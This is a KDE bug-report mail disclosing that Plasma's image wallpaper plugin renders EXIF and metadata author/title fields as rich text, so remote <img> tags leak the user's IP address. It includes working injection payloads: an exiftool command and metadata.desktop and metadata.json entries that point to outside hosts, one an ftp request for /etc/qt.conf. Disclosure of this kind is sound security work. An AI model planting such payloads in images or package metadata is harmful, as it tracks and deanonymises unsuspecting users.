https://bugs.kde.org/show_bug.cgi?id=480106
Bug ID: 480106
Summary: plasma wallpaper image parsing IP address leak via
EXIF attributes / metadata.desktop / metadata.json
Classification: Plasma
Product: plasmashell
Version: 5.27.10
Platform: Other
OS: Linux
Status: REPORTED
Severity: critical
Priority: NOR
Component: Image Wallpaper
Assignee: plasma-b...@kde.org
Reporter: benjaminfle...@icloud.com
CC: notm...@gmail.com, qydwhotm...@gmail.com,
secur...@kde.org
Target Milestone: 1.0
Created attachment 165086
--> https://bugs.kde.org/attachment.cgi?id=165086&action=edit
IP address leak from plasma wallpaper via QML RichText parsing of user-provided
text
SUMMARY
***
exif image information is used by plasma image wallpaper to create a qml
richtext string to display author and title of a wallpaper image. the QML
richtext can contain <img> tags which point to outside servers. http:// and
ftp:// links in the <img> tags are followed to remote addressess
AUTHOR & NAME fields in metadata.desktop are also affected, as well as the
author & name in metadata.json
exploitable EXIF tags: Exif.Image.XPTitle, Exif.Image.DocumentName,
Exif.Image.ImageDescription, Exif.Image.Artist, Exif.Image.XPAuthor,
Exif.Image.Copyright
bugged code is here:
https://github.com/KDE/plasma-workspace/blob/master/wallpapers/image/plugin/finder/mediametadatafinder.cpp#L34
***
STEPS TO REPRODUCE
EASY:
1. download
https://www.deutsche-cyberberatung.de/plasma-shell-wallpaper-ip-address-leak.jpg
2. place file in ~/.local/share/wallpapers/
3. go on desktop -> right click -> "configure desktop and wallpaper"
4. see that the code is rendered in UI as QML Richtext
IMAGE w/ EXIF INFO:
1. take random jpg image
2. run `exiftool -Artist='benjaminflesch<br/><img
src="https://www.spyber.com/sig-54300.png"/>' bugme.jpg
-overwrite_original_in_place`
3. go on desktop -> right click -> "configure desktop and wallpaper"
4. see that the code is rendered in UI as QML Richtext
METADATA.DESKTOP:
[Desktop Entry]
Name=foobar<img src="https://www.spyber.com/sig-54300.png"; /><br/><img
src="/home/beni/src/2024-kde-plasma-theme-adhd-climate-disaster-dark/beni-wallpaper/foobar/contents/layouts/image.svg"/><br/><img
src="ftp://1.2.3.4/etc/qt.conf"/><br/><h1>huhu</h1>
Author=foobar<img src="https://www.spyber.com/sig-54300.png"; /><br/><img
src="/home/beni/src/2024-kde-plasma-theme-adhd-climate-disaster-dark/beni-wallpaper/foobar/contents/layouts/image.svg"/><br/><img
src="ftp://1.2.3.4/etc/qt.conf"/><br/><h1>huhu</h1>
METADATA.JSON:
{
"KPlugin": {
"Authors": [
{
"Name": "Benjamin Flesch <img
src='https://www.spyber.com/sig-54300.png' />",
"Email": "b...@deutsche-cyberberatung.de"
}
],
"Name": "leakmyaddress <img src='https://www.spyber.com/sig-54300.png'
/>"
....
}
OBSERVED RESULT
html code from exif author field is parsed as QML richtext and allows IP
address leak
EXPECTED RESULT
user-provided exif fields should not be parsed
SOFTWARE/OS VERSIONS
kdeplasma-addons 5.27.10-2
plasma-browser-integration 5.27.10-1
plasma-desktop 5.27.10-1
plasma-disks 5.27.10-1
plasma-firewall 5.27.10-1
plasma-framework5 5.114.0-1
plasma-integration 5.27.10-1
plasma-meta 5.27-4
plasma-nm 5.27.10-1
plasma-pa 5.27.10-1
plasma-sdk 5.27.10-1
plasma-systemmonitor 5.27.10-1
plasma-thunderbolt 5.27.10-1
plasma-vault 5.27.10-1
plasma-wayland-session 5.27.10-2
plasma-welcome 5.27.10-1
plasma-workspace 5.27.10-2
plasma-workspace-wallpapers 5.27.10-1
plasmatube 23.08.4-1
ADDITIONAL INFORMATION
--
You are receiving this mail because:
You are watching all bug changes.
![https://www.spyber.com/sig-54300.png"/](https://www.spyber.com/sig-54300.png"/){kind=link}
![https://www.spyber.com/sig-54300.png"](https://www.spyber.com/sig-54300.png"){kind=link}
